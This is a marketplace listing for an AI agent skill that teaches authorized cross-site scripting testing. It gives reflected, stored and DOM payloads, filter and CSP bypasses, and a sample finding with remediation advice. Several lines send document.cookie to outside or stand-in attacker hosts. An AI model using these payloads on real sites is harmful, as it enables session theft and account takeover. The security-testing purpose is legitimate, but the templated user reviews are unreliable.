Tests web applications for Cross-Site Scripting (XSS) vulnerabilities by injecting JavaScript payloads into reflected, stored, and DOM-based contexts to demonstrate client-side code execution, session hijacking, and user impersonation. The tester identifies all injection points and output contexts, crafts context-appropriate payloads, and bypasses sanitization and CSP protections. Activates for requests involving XSS testing, cross-site scripting assessment, client-side injection testing, or JavaScript injection vulnerability testing.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versiontesting-for-xss-vulnerabilitiesExecute the skills CLI command in your project's root directory to begin installation:
Fetches testing-for-xss-vulnerabilities from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate testing-for-xss-vulnerabilities. Access via /testing-for-xss-vulnerabilities in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | testing-for-xss-vulnerabilities |
| description | 'Tests web applications for Cross-Site Scripting (XSS) vulnerabilities by injecting JavaScript payloads into reflected, stored, and DOM-based contexts to demonstrate client-side code execution, session hijacking, and user impersonation. The tester identifies all injection points and output contexts, crafts context-appropriate payloads, and bypasses sanitization and CSP protections. Activates for requests involving XSS testing, cross-site scripting assessment, client-side injection testing, or JavaScript injection vulnerability testing. ' |
| domain | cybersecurity |
| subdomain | penetration-testing |
| tags | - XSS - cross-site-scripting - client-side-security - OWASP-A03 - JavaScript-injection |
| version | 1.0.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - ID.RA-01 - ID.RA-06 - GV.OV-02 - DE.AE-07 |
Do not use against applications without written authorization, for deploying persistent XSS payloads that affect real users, or for exfiltrating actual user session tokens from production environments.
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Map every location where user input enters and is rendered by the application:
location.hash, location.search, document.referrer, window.name, postMessage, or localStorage and writes to the DOM<div>USER_INPUT</div><input value="USER_INPUT">var x = 'USER_INPUT';<a href="USER_INPUT"><div style="color: USER_INPUT">Test reflected injection points with context-appropriate payloads:
<script>alert(document.domain)</script>, <img src=x onerror=alert(1)>, <svg onload=alert(1)>" onfocus=alert(1) autofocus=", " onmouseover=alert(1) ", "><script>alert(1)</script>';alert(1)//, \';alert(1)//, </script><script>alert(1)</script>javascript:alert(1), data:text/html,<script>alert(1)</script>--><script>alert(1)</script><!--<ScRiPt>alert(1)</sCrIpT><details open ontoggle=alert(1)><svg><animate onbegin=alert(1) attributeName=x><img src=x onerror=alert(1)>Test persistent storage points that render input to other users:
<script>alert('XSS-PROFILE-001')</script>"><script src=https://yourxsshunter.xss.ht></script>) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly accessAnalyze client-side JavaScript for unsafe DOM manipulation:
document.location, document.URL, document.referrerlocation.hash, location.search, location.hrefwindow.name, postMessage event datainnerHTML, outerHTML, document.write(), document.writeln()eval(), setTimeout(), setInterval(), Function()element.setAttribute() with event handlers, jQuery.html(), .append(), v-html (Vue), dangerouslySetInnerHTML (React)dangerouslySetInnerHTML, Angular template injection ({{constructor.constructor('alert(1)')()}}), Vue v-html directiveTest Content Security Policy effectiveness and demonstrate real-world impact:
unsafe-inline in script-src allows inline scriptsunsafe-eval allows eval() and similar functions*.googleapis.com) may host JSONP endpoints usable for CSP bypassbase-uri not set allows <base> tag injection to redirect relative script loads<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script><script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>| Term | Definition |
|---|---|
| Reflected XSS | Non-persistent XSS where the injected payload is included in the server's response to the same request, requiring the victim to click a crafted URL |
| Stored XSS | Persistent XSS where the payload is saved on the server and served to other users who view the affected page |
| DOM-Based XSS | XSS that occurs entirely in the browser when client-side JavaScript reads attacker-controlled data and writes it to a dangerous DOM sink |
| Content Security Policy | HTTP response header that restricts which sources the browser can load scripts, styles, and other resources from, providing defense-in-depth against XSS |
| Output Encoding | Converting special characters to their HTML entity equivalents (e.g., < to <) to prevent the browser from interpreting user input as code |
| Sink | A JavaScript function or DOM property that can cause code execution or HTML rendering if attacker-controlled data reaches it unsanitized |
Context: An e-commerce platform has a customer support system where customers submit tickets that are viewed by support agents in an internal admin panel. The ticket submission form accepts HTML formatting.
Approach:
Pitfalls:
<script>alert(1)</script> and missing XSS that fires through event handlers or in non-HTML contexts## Finding: Stored XSS in Support Ticket Description
**ID**: XSS-002
**Severity**: High (CVSS 8.1)
**Affected URL**: POST /api/tickets (submission), GET /admin/tickets/8847 (trigger)
**Parameter**: description (POST body)
**XSS Type**: Stored (persistent)
**Description**:
The support ticket description field does not sanitize HTML input before storing
it in the database. When a support agent views the ticket in the admin panel, the
unsanitized HTML is rendered in the agent's browser, allowing arbitrary JavaScript
execution in the context of the admin application.
**Proof of Concept**:
Submitted ticket with payload:
<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">
The payload fired when the agent viewed the ticket, exfiltrating the admin session
cookie to the XSS Hunter server.
**Impact**:
An attacker can steal the session tokens of support agents and administrators,
gaining access to the admin panel with privileges to view customer PII, process
refunds, and modify orders. Affects all 23 support agents who view customer tickets.
**Remediation**:
1. Implement output encoding using a context-aware library (OWASP Java Encoder,
DOMPurify for client-side rendering)
2. Deploy Content Security Policy header:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
3. Set HttpOnly flag on session cookies to prevent JavaScript access
4. Sanitize HTML input server-side using a whitelist approach (allow only safe tags)
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
testing-for-xss-vulnerabilities is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
testing-for-xss-vulnerabilities has been reliable in day-to-day use. Documentation quality is above average for community skills.
testing-for-xss-vulnerabilities reduced setup friction for our internal harness; good balance of opinion and flexibility.
Keeps context tight: testing-for-xss-vulnerabilities is the kind of skill you can hand to a new teammate without a long onboarding doc.
I recommend testing-for-xss-vulnerabilities for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
testing-for-xss-vulnerabilities reduced setup friction for our internal harness; good balance of opinion and flexibility.
Keeps context tight: testing-for-xss-vulnerabilities is the kind of skill you can hand to a new teammate without a long onboarding doc.
testing-for-xss-vulnerabilities is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
Useful defaults in testing-for-xss-vulnerabilities — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
I recommend testing-for-xss-vulnerabilities for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
showing 1-10 of 31